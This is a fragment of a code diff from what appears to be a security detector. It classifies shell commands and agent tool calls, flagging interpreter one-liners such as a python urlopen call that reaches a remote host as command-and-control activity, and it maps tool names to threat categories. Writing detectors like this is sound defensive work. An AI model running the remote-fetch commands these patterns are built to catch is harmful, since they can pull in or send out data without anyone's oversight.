+ # INTERPRETER_NETWORK reads `literal`, not `written`: the payload of
226
+ # `python -c "urllib.request.urlopen(...)"` is double-quoted and is the
227
+ # program being run, so blanking it would hide the very thing being
228
+ # matched. Single quotes and heredocs are still masked, which is what
229
+ # keeps `echo 'python -c "urlopen"'` from firing.
230
+ if _reaches_remote_host(text) and (
231
+ _NETWORK_CLIENT.search(written) or INTERPRETER_NETWORK.search(literal)
232
+ ):
233
+ return _C2
234
+
235
+ # 2. Tool-name mapping on the method segment (the part after the last '.'),
236
+ # normalized so Cursor/Claude/driver spellings all land on one entry.
237
+ if not tool_qualified:
238
+ return None
239
+ method = _norm(tool_qualified.rsplit(".", 1)[-1])
240
+ return _TOOL_MAP.get(method)
241
+
242
+
243
+ # Backwards-compatible alias for any callers importing the old name.
244
+ MITRE_MAPPINGS = _TOOL_MAP